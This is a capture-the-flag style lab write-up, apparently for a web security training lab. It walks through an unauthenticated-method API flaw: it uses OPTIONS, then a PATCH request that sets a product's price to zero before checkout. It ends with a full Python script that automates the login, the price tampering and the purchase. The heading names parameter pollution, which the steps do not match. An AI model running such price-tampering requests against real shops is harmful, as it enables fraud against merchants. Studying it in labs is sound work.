2. Exploiting server-side parameter pollution in a query string

Accessing the webpage:

We have to buy this:

But we have to login first:

We got the api in burpsuite:

It prints the price of the product as we set it to one here:

We can also find it using the JavaScript file:

We do not have enough money to purchase it, we have to find out another way:

Using OPTIONS to get the allowed methods:

Lets try PATCH:

So we have to login in:

After logging in and setting the session:

But it says that we have to use json in the content-type header, lets do it, and set an empty curly braces as data:

Here we go, it says that we have to set a parameter called price as input in json formats, lets put it and set it to 0, because we want to buy the Leet jacket we have to put its price to zero so we can buy it for example, with PATCH method to change the price:

Lets see if it changed in the website:

Here we go:

Now we can buy it:

Solve it using a python3 script:

import requests  
import re  
import os  
import sys  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
  
session = requests.session()  
  
headers = {  
    "Content-Type": "application/json"  
}  
  
price_data = {  
    "price": 0  
}  
  
  
def Login(username, password):  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    print("[*] Logging In.")  
    data = f"csrf={csrf[0]}&username={username}&password={password}"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
  
def PatchPrice():  
    print("[*] Patch The Price To 0.")  
    session.patch(url=url + "api/products/1/price", headers=headers, json=price_data, proxies=proxies, verify=False)  
  
  
def BuyProduct():  
    hearders = {  
        "Content-Type": "application/x-www-form-urlencoded",  
    }  
    Product_data = "productId=1&redir=PRODUCT&quantity=1"  
    print("[*] Adding The Product To Cart.")  
    session.post(url=url + "cart",  headers=hearders, data=Product_data, allow_redirects=True, proxies=proxies, verify=False)  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "cart", proxies=proxies, verify=False).text)  
    print("[*] Purchase The Product.")  
    Checkout_data = f"csrf={csrf[0]}"  
    session.post(url=url + "cart/checkout", data=Checkout_data, proxies=proxies, verify=False)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    Login("wiener", "peter")  
    PatchPrice()  
    BuyProduct()  
    print("[+] Solved.")

Previous1. Exploiting an API endpoint using documentation Next3. Finding and exploiting an unused API endpoint

Last updated 1 month ago